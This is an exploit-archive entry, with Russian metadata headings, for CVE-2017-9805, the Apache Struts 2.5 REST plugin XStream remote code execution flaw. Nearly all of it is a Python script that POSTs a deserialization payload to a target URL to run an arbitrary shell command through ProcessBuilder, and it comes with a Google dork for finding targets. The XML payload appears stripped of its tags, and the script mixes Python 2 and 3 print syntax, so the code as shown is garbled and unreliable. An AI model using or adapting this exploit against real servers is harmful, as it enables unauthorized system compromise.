Apache Struts 2.5 - Remote Code Execution

Свойства

Дата публикации:
07.09.2017
Цель:
Apache Struts 2.5
Тип воздействия:
Компрометация системы

Код

# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805
 
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import requests
import sys
 
def exploration(command):
 
    exploit = '''
                
                
                
                0
                
                
                
                
                
                false
                0
                
                
                
                
                
                /bin/sh-c'''+ command +'''
                
                false
                
                
                
                
                java.lang.ProcessBuilder
                start
                
                
                foo
                
                foo
                
                
                
                
                
                false
                0
                0
                false
                
                false
                
                
                
                0
                
                
                
                
                
                
                
                
                
                '''
 
 
    url = sys.argv[1]
 
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
            'Content-Type': 'application/xml'}
 
    request = requests.post(url, data=exploit, headers=headers)
    print request.text
 
if len(sys.argv) < 3:
    print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
    print ('[*] Warflop - http://securityattack.com.br')
    print ('[*] Greatz: Pimps & G4mbl3r')
    print ('[*] Use: python struts2.py URL COMMAND')
    print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
    exit(0)
else:
    exploration(sys.argv[2])